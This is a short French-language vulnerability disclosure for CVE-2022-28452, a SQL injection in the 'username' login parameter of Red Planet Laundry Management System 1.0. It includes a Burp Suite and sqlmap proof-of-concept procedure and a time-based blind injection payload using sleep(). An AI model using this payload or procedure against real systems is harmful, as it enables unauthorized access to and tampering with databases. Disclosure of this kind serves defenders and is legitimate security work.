
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-Description:
Red Planet Laundry Management System 1.0 est vulnérable à une injection SQL via le paramètre 'username' dans /index.php/login/rediract . L'exploitation de cette vulnérabilité pourrait permettre à un attaquant de compromettre l'application, d'accéder ou de modifier des données, ou d'exploiter des vulnérabilités latentes dans la base de données sous-jacente.
2-Preuve de concept :
Dans Burpsuite, interceptez la requête depuis la page affectée avec le paramètre 'username' et enregistrez-la sous poc.txt. Ensuite, exécutez SQLmap pour extraire les données de la base de données : sqlmap.py -r poc.txt --dbms=mysql
3-Exemple de payload :
Le paramètre POST encodé en URL 'username' a été défini sur 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
Coordonnées de contact : [email protected]